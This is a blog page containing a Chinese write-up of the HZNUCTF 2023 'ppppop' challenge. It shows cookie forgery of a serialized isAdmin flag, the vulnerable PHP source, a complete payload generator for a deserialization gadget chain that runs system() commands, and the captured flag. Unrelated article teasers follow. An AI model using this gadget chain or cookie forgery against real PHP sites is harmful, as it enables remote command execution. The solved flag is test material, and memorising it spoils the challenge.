news 2026/5/8 4:00:11

[HZNUCTF 2023 preliminary]ppppop

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
[HZNUCTF 2023 preliminary]ppppop

打开题目便是空白页面,查看源代码,也是空白的,没有任何内容,进行目录扫描发现

有目录,但是内容都是为0

进行抓包,发现cookie中user的值有点像base64编码

尝试进行解码

解码内容是O:4:"User":1:{s:7:"isAdmin";b:0;},

其中b:0:表示一个布尔类型的值,0代表着false为假,1代表着true

也就是讲User对象的isAdmin属性当前为false,就是表示这个用户不是管理员,那就将0改为1,

和原本的user值换一下发包

就返回反序列化代码

<?php error_reporting(0); include('utils.php'); //包含utils.php文件 class A { //定义一个A类,类中有三个公共属性 public $className; public $funcName; public $args; public function __destruct() { //当对象销毁时触发 $class = new $this->className; //将className进行实例化。让这样就可以将className的值为B,就相当于new B了 $funcName = $this->funcName; //funcName属性的值赋值给funcName,这是方法名 $class->$funcName($this->args); //args属性值是参数 } } class B { public function __call($func, $arg) { //当调用不存在的方法时触发,$func是方法名,$arg是参数 $func($arg[0]); //这就是函数回调(function call)!如果 $func = "system",$arg[0] = "id",那么就会执行 system("id")! } } if(checkUser()) { highlight_file(__FILE__); $payload = strrev(base64_decode($_POST['payload'])); //将post传的参数值进行base64加密然后进行字符串反转 unserialize($payload); //这样我们可以将serialize结果先进行字符串反转,然后进行base64编码 }

这题比较简单,就是将className等于B类,这样就相当于实例了B类并赋值给了class,class调用$funcName($this->args)就是调用funcName()方法,这个方法在B类中是不存在的,所以就触发了__call方法,触发__call方法传入的两个变量$func, $arg它们分别是funcName属性的值和args的值,触发了__call方法,就会调动$func($arg[0]);这是函数回调,如果 $func = "system",$arg[0] = "id",那么就会执行 system("id")!

所以payload:

<?php class A { public $className; public $funcName; public $args; public function __destruct() { $class = new $this->className; $funcName = $this->funcName; $class->$funcName($this->args); } } class B { public function __call($func, $arg) { $func($arg[0]); } } $a=new A(); $a->className="B"; $a->funcName="system"; $a->args="env"; echo base64_encode(strrev(serialize($a)));

ls和ls /都没有发现flag文件,所以看看env中有没有flag

NSSCTF{417cea44-7104-4dee-8235-af0ee3d15ebb}

本题的知识点

其中b:0:表示一个布尔类型的值,0代表着false为假,1代表着true

$func($arg[0]); :这是函数回调!如果 $func = "system",$arg[0] = "id",那么就会执行 system("id")!

strrev函数是将字符串内容反转,就是将字符串中的字符顺序颠倒过来

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/6 22:44:48

揭秘Android截屏限制:FLAG_SECURE深度解析与实战解决方案

揭秘Android截屏限制&#xff1a;FLAG_SECURE深度解析与实战解决方案 【免费下载链接】DisableFlagSecure 项目地址: https://gitcode.com/gh_mirrors/dis/DisableFlagSecure 在Android生态系统中&#xff0c;FLAG_SECURE安全标志如同无形的屏障&#xff0c;影响着用户…

作者头像 李华
网站建设 2026/5/5 13:55:43

27、趣味Shell脚本与云服务实用指南

趣味Shell脚本与云服务实用指南 1. Acey Deucey纸牌游戏脚本解析 在这个Acey Deucey纸牌游戏脚本中,核心功能在于模拟洗牌和让玩家猜测第三张牌是否介于前两张牌的点数之间。以下为部分关键代码: if [ $splitValue -eq 0 ] ; thenecho "No point in betting when th…

作者头像 李华
网站建设 2026/5/5 22:34:32

28、云端与图像处理脚本实用指南

云端与图像处理脚本实用指南 幻灯片展示脚本 幻灯片展示脚本用于从指定目录中显示照片幻灯片,使用了 ImageMagick 的 display 实用程序。以下是脚本代码: #!/bin/bash # slideshow--Displays a slide show of photos from the specified directory. # Uses ImageMag…

作者头像 李华
网站建设 2026/5/3 12:50:22

29、ImageMagick:强大的图形文件处理工具

ImageMagick:强大的图形文件处理工具 在图形文件处理领域,ImageMagick 是一款功能强大但使用起来颇具挑战的工具。它能完成诸如添加水印、给图像添加边框或框架、创建缩略图以及解析 GPS 地理定位信息等复杂任务。下面将详细介绍如何利用 ImageMagick 实现这些功能。 1. 给…

作者头像 李华
网站建设 2026/5/7 9:42:17

医疗康复Agent方案调整关键技术突破(2024最新临床实证结果披露)

第一章&#xff1a;医疗康复 Agent 的方案调整在医疗康复领域&#xff0c;智能 Agent 的核心价值在于根据患者动态反馈实时调整治疗策略。传统的固定康复路径难以适应个体差异&#xff0c;而基于强化学习与多模态数据融合的 Agent 能够持续优化干预方案。数据驱动的动态评估机制…

作者头像 李华